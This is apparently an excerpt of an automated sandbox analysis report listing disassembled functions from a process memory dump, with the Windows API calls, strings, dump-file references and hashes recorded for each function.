                                                    Function 003A8C9B Relevance: 31.7, APIs: 14, Strings: 4, Instructions: 196windowlibraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _wcslen.LIBCMT ref: 003A8CB9
                                                    • _wcslen.LIBCMT ref: 003A8CCD
                                                    • _wcslen.LIBCMT ref: 003A8CF0
                                                    • _wcslen.LIBCMT ref: 003A8D13
                                                    • LoadImageW.USER32 ref: 003A8D51
                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,003A6551), ref: 003A8DAD
                                                    • LoadImageW.USER32 ref: 003A8DE6
                                                    • LoadImageW.USER32 ref: 003A8E29
                                                    • LoadImageW.USER32 ref: 003A8E60
                                                    • FreeLibrary.KERNEL32(?), ref: 003A8E6C
                                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 003A8E7C
                                                    • DestroyIcon.USER32(?,?,?,?,?,003A6551), ref: 003A8E8B
                                                    • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 003A8EA8
                                                    • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 003A8EB4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                    • String ID: .dll$.exe$.icl$Qe:
                                                    • API String ID: 799131459-2273183642
                                                    • Opcode ID: d309f80d6ab917d3d8649c77f03f233493525bf1795d6771cd4371345e7628c9
                                                    • Instruction ID: 7dbb1ff1826de41f778e5f17092bc7cf68e52c21b4c63bc0f04f424c3a86abdc
                                                    • Opcode Fuzzy Hash: d309f80d6ab917d3d8649c77f03f233493525bf1795d6771cd4371345e7628c9
                                                    • Instruction Fuzzy Hash: 7A61BD71600215FAEB169F64CC81FFE77ACFB1A710F104606F916DA1D1DB74A990CBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003847D3 Relevance: 28.2, APIs: 8, Strings: 8, Instructions: 205COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CharLowerBuffW.USER32(?,?), ref: 00384852
                                                    • _wcslen.LIBCMT ref: 0038485D
                                                    • _wcslen.LIBCMT ref: 003848B4
                                                    • _wcslen.LIBCMT ref: 003848F2
                                                    • GetDriveTypeW.KERNEL32(?), ref: 00384930
                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00384978
                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 003849B3
                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 003849E1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: SendString_wcslen$BuffCharDriveLowerType
                                                    • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                    • API String ID: 1839972693-4113822522
                                                    • Opcode ID: 25627f0d502a97ed2f9eab727fc68a06e83a6ece5a6f25912607e8106e819c48
                                                    • Instruction ID: 081ddcf171e4dbef072a78f0fc6e096e373e5aec99f750cefa420bdd6febb90d
                                                    • Opcode Fuzzy Hash: 25627f0d502a97ed2f9eab727fc68a06e83a6ece5a6f25912607e8106e819c48
                                                    • Instruction Fuzzy Hash: 0971E0326083129FC716EF34C8808AAB7E4FF98754F00496DF8969B661EB35DD85CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003762AA Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadIconW.USER32(00000063), ref: 003762BD
                                                    • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 003762CF
                                                    • SetWindowTextW.USER32(?,?), ref: 003762E6
                                                    • GetDlgItem.USER32 ref: 003762FB
                                                    • SetWindowTextW.USER32(00000000,?), ref: 00376301
                                                    • GetDlgItem.USER32 ref: 00376311
                                                    • SetWindowTextW.USER32(00000000,?), ref: 00376317
                                                    • SendDlgItemMessageW.USER32 ref: 00376338
                                                    • SendDlgItemMessageW.USER32 ref: 00376352
                                                    • GetWindowRect.USER32 ref: 0037635B
                                                    • _wcslen.LIBCMT ref: 003763C2
                                                    • SetWindowTextW.USER32(?,?), ref: 003763FE
                                                    • GetDesktopWindow.USER32 ref: 00376404
                                                    • GetWindowRect.USER32 ref: 0037640B
                                                    • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00376462
                                                    • GetClientRect.USER32 ref: 0037646F
                                                    • PostMessageW.USER32(?,00000005,00000000,?), ref: 00376494
                                                    • SetTimer.USER32 ref: 003764BE
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                    • String ID:
                                                    • API String ID: 895679908-0
                                                    • Opcode ID: b4723b5610f8ba618166a872af2152c38be481d5cc1da8a9e4c5c6920833f98e
                                                    • Instruction ID: 545586b7d7dbbfe0ec0e33a82dc33b2947b34f77c0a67788322576556d039b1e
                                                    • Opcode Fuzzy Hash: b4723b5610f8ba618166a872af2152c38be481d5cc1da8a9e4c5c6920833f98e
                                                    • Instruction Fuzzy Hash: 42719231900B05EFDB32DFA9CE56AAEBBF9FF48704F104518E14AA25A0D779E944CB50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0039076B Relevance: 27.1, APIs: 18, Instructions: 128COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadCursorW.USER32(00000000,00007F89), ref: 00390784
                                                    • LoadCursorW.USER32(00000000,00007F8A), ref: 0039078F
                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 0039079A
                                                    • LoadCursorW.USER32(00000000,00007F03), ref: 003907A5
                                                    • LoadCursorW.USER32(00000000,00007F8B), ref: 003907B0
                                                    • LoadCursorW.USER32(00000000,00007F01), ref: 003907BB
                                                    • LoadCursorW.USER32(00000000,00007F81), ref: 003907C6
                                                    • LoadCursorW.USER32(00000000,00007F88), ref: 003907D1
                                                    • LoadCursorW.USER32(00000000,00007F80), ref: 003907DC
                                                    • LoadCursorW.USER32(00000000,00007F86), ref: 003907E7
                                                    • LoadCursorW.USER32(00000000,00007F83), ref: 003907F2
                                                    • LoadCursorW.USER32(00000000,00007F85), ref: 003907FD
                                                    • LoadCursorW.USER32(00000000,00007F82), ref: 00390808
                                                    • LoadCursorW.USER32(00000000,00007F84), ref: 00390813
                                                    • LoadCursorW.USER32(00000000,00007F04), ref: 0039081E
                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 00390829
                                                    • GetCursorInfo.USER32(?), ref: 00390839
                                                    • GetLastError.KERNEL32 ref: 0039087B
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: Cursor$Load$ErrorInfoLast
                                                    • String ID:
                                                    • API String ID: 3215588206-0
                                                    • Opcode ID: 968da39b4edabadf585af1e9efeb0de8c159b5ad7f3835a7573a947fecf46032
                                                    • Instruction ID: 2a545dc143c48bb24698cbd61ec60d485d5b32df77c6ecdbd82d7c8a012a8b3e
                                                    • Opcode Fuzzy Hash: 968da39b4edabadf585af1e9efeb0de8c159b5ad7f3835a7573a947fecf46032
                                                    • Instruction Fuzzy Hash: B1418570E083196EDB15DFBA8C8985EBFE8FF04354B50452AE11DEB691DA78E801CF90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00384E1A Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CharLowerBuffW.USER32(00000000,00000000,003ADCD0), ref: 00384E81
                                                    • _wcslen.LIBCMT ref: 00384E95
                                                    • _wcslen.LIBCMT ref: 00384EF3
                                                    • _wcslen.LIBCMT ref: 00384F4E
                                                    • _wcslen.LIBCMT ref: 00384F99
                                                    • _wcslen.LIBCMT ref: 00385001
                                                      • Part of subcall function 0032FD60: _wcslen.LIBCMT ref: 0032FD6B
                                                    • GetDriveTypeW.KERNEL32(?,003D7C10,00000061), ref: 0038509D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: _wcslen$BuffCharDriveLowerType
                                                    • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                    • API String ID: 2055661098-1000479233
                                                    • Opcode ID: 581fb3481df0bacb93fc47b2013ad6d9598447636227c74df930acfe62d9555d
                                                    • Instruction ID: af92e5e15885d1e24eaa1326a3e3dc00f477124a29ba540ca07b31f49940b91e
                                                    • Opcode Fuzzy Hash: 581fb3481df0bacb93fc47b2013ad6d9598447636227c74df930acfe62d9555d
                                                    • Instruction Fuzzy Hash: 54B138716083029FC716EF28D890A6AB7E5FFA4710F50495DF596CB291EB30DC84CB92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00394946 Relevance: 23.2, APIs: 11, Strings: 2, Instructions: 478libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,003ADCD0), ref: 00394A18
                                                    • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00394A2A
                                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,003ADCD0), ref: 00394A4F
                                                    • FreeLibrary.KERNEL32(00000000,?,003ADCD0), ref: 00394A9B
                                                    • StringFromGUID2.OLE32(?,?,00000028,?,003ADCD0), ref: 00394B05
                                                    • SysFreeString.OLEAUT32(00000009), ref: 00394BBF
                                                    • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00394C25
                                                    • SysFreeString.OLEAUT32(?), ref: 00394C4F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: FreeString$Library$AddressFileFromLoadModuleNamePathProcQueryType
                                                    • String ID: GetModuleHandleExW$kernel32.dll
                                                    • API String ID: 354098117-199464113
                                                    • Opcode ID: b784c4471e05d0c2d166d372715331be89240e52fc2b92078f50a2831aaee17f
                                                    • Instruction ID: 19fb83db03bb090d67523662289d592d09e2e1ba14ec8dcb334d8ddae26b4109
                                                    • Opcode Fuzzy Hash: b784c4471e05d0c2d166d372715331be89240e52fc2b92078f50a2831aaee17f
                                                    • Instruction Fuzzy Hash: 1E123B75A00115EFDF16DF94C884EAEBBB9FF49314F258098E906AB251D731ED42CBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0038CDD3 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0038CE0D
                                                    • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0038CE20
                                                    • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0038CE34
                                                    • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0038CE4D
                                                    • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0038CE90
                                                    • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0038CEA6
                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0038CEB1
                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0038CEE1
                                                    • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0038CF39
                                                    • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0038CF4D
                                                    • InternetCloseHandle.WININET(00000000), ref: 0038CF58
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                    • String ID:
                                                    • API String ID: 3800310941-3916222277
                                                    • Opcode ID: fa742b55d43d3559c255250f82a17899ff96f25d65c6ec1b8e47efcb05db0a4f
                                                    • Instruction ID: 08b0e131b7ffb823efe2077423547db1240baa1f6f85ab796d4b700a4be7d373
                                                    • Opcode Fuzzy Hash: fa742b55d43d3559c255250f82a17899ff96f25d65c6ec1b8e47efcb05db0a4f
                                                    • Instruction Fuzzy Hash: 8E518BB0510308BFEB22AF60CC48AAA7BFDFF09744F008459FA4686550D735E904DBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003A8ECE Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00000000,?,000000EC), ref: 003A8EF1
                                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 003A8F01
                                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 003A8F0C
                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 003A8F19
                                                    • GlobalLock.KERNEL32 ref: 003A8F27
                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 003A8F36
                                                    • GlobalUnlock.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 003A8F3F
                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 003A8F46
                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,000000F0,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 003A8F57
                                                    • OleLoadPicture.OLEAUT32(000000F0,00000000,00000000,003B0C04,?), ref: 003A8F70
                                                    • GlobalFree.KERNEL32 ref: 003A8F80
                                                    • GetObjectW.GDI32(?,00000018,?,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 003A8FA0
                                                    • CopyImage.USER32 ref: 003A8FD0
                                                    • DeleteObject.GDI32(?), ref: 003A8FF8
                                                    • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 003A900E
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                    • String ID:
                                                    • API String ID: 3840717409-0
                                                    • Opcode ID: 481b1db8fc7573447f38c4aae022cff30e07499dd7cd25917241d0042e867be2
                                                    • Instruction ID: ca0efce6bad62be518ef83819bf3a3593e308591c8fa8f46aa025ed5b29500e4
                                                    • Opcode Fuzzy Hash: 481b1db8fc7573447f38c4aae022cff30e07499dd7cd25917241d0042e867be2
                                                    • Instruction Fuzzy Hash: 33412875600205AFDB12DF65DC88EABBBBDFF8A751F104458F906EB660DB309901CB20
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00392EB9 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetDC.USER32(00000000), ref: 00392F35
                                                    • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00392F45
                                                    • CreateCompatibleDC.GDI32(?), ref: 00392F51
                                                    • SelectObject.GDI32(00000000,?), ref: 00392F5E
                                                    • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00392FCA
                                                    • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00393009
                                                    • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 0039302D
                                                    • SelectObject.GDI32(?,?), ref: 00393035
                                                    • DeleteObject.GDI32(?), ref: 0039303E
                                                    • DeleteDC.GDI32(?), ref: 00393045
                                                    • ReleaseDC.USER32 ref: 00393050
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                    • String ID: (
                                                    • API String ID: 2598888154-3887548279
                                                    • Opcode ID: 0d8a2d046772b41c1d757c1bcb19073cf8910c108689fc46e8e7cb9503dd20f2
                                                    • Instruction ID: 57557590bd51f6b150cb52b998cddd5709763ccb8f3b42f8f818b0406b0f946f
                                                    • Opcode Fuzzy Hash: 0d8a2d046772b41c1d757c1bcb19073cf8910c108689fc46e8e7cb9503dd20f2
                                                    • Instruction Fuzzy Hash: 1661E3B5D00619EFCF05CFA4D884EAEBBB9FF48310F208529E556A7650E771A941CF90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0037C80C Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 190windowsleepCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetMenuItemInfoW.USER32(003E2990,000000FF,00000000,00000030), ref: 0037C888
                                                    • SetMenuItemInfoW.USER32 ref: 0037C8BD
                                                    • Sleep.KERNEL32(000001F4), ref: 0037C8CF
                                                    • GetMenuItemCount.USER32 ref: 0037C915
                                                    • GetMenuItemID.USER32(?,00000000), ref: 0037C932
                                                    • GetMenuItemID.USER32(?,-00000001), ref: 0037C95E
                                                    • GetMenuItemID.USER32(?,?), ref: 0037C9A5
                                                    • CheckMenuRadioItem.USER32 ref: 0037C9EB
                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0037CA00
                                                    • SetMenuItemInfoW.USER32 ref: 0037CA21
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: ItemMenu$Info$CheckCountRadioSleep
                                                    • String ID: 0
                                                    • API String ID: 1460738036-4108050209
                                                    • Opcode ID: 5caa859e9923e85d0e291d5ace0e54dd0e110d6ffc79f58b4ddfd58d954ecc5d
                                                    • Instruction ID: 3edc9b251ec7d362c0d40f5c37db2763882693d90be9aa38682fc319cb0752c7
                                                    • Opcode Fuzzy Hash: 5caa859e9923e85d0e291d5ace0e54dd0e110d6ffc79f58b4ddfd58d954ecc5d
                                                    • Instruction Fuzzy Hash: 95618F70910259AFDF72CF64DC88AEEBBB8FB06304F05911DE949A7291D738AD05CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0037E3D7 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 178COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetFileVersionInfoSizeW.VERSION(?,?), ref: 0037E3E9
                                                    • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 0037E40F
                                                    • _wcslen.LIBCMT ref: 0037E419
                                                    • _wcsstr.LIBVCRUNTIME ref: 0037E469
                                                    • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 0037E485
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
                                                    • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                    • API String ID: 1939486746-1459072770
                                                    • Opcode ID: 201fabbd7e03f3ca645c6f30eacb55d01288c0c51b0ed3ae8f06f60893b3fe40
                                                    • Instruction ID: 0898050e081d4244fcaa7e4d906eb99b153e07a91830a1e89008ed66aec53ca8
                                                    • Opcode Fuzzy Hash: 201fabbd7e03f3ca645c6f30eacb55d01288c0c51b0ed3ae8f06f60893b3fe40
                                                    • Instruction Fuzzy Hash: 9E413B72A402147BEB17AB649C87EFF77ACDF4A320F004056F505AA582FB78DA0197A5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00384678 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 101fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0038469A
                                                    • _wcslen.LIBCMT ref: 003846C7
                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 003846F7
                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00384718
                                                    • RemoveDirectoryW.KERNEL32(?), ref: 00384728
                                                    • DeviceIoControl.KERNEL32 ref: 003847AF
                                                    • CloseHandle.KERNEL32(00000000), ref: 003847BA
                                                    • CloseHandle.KERNEL32(00000000), ref: 003847C5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
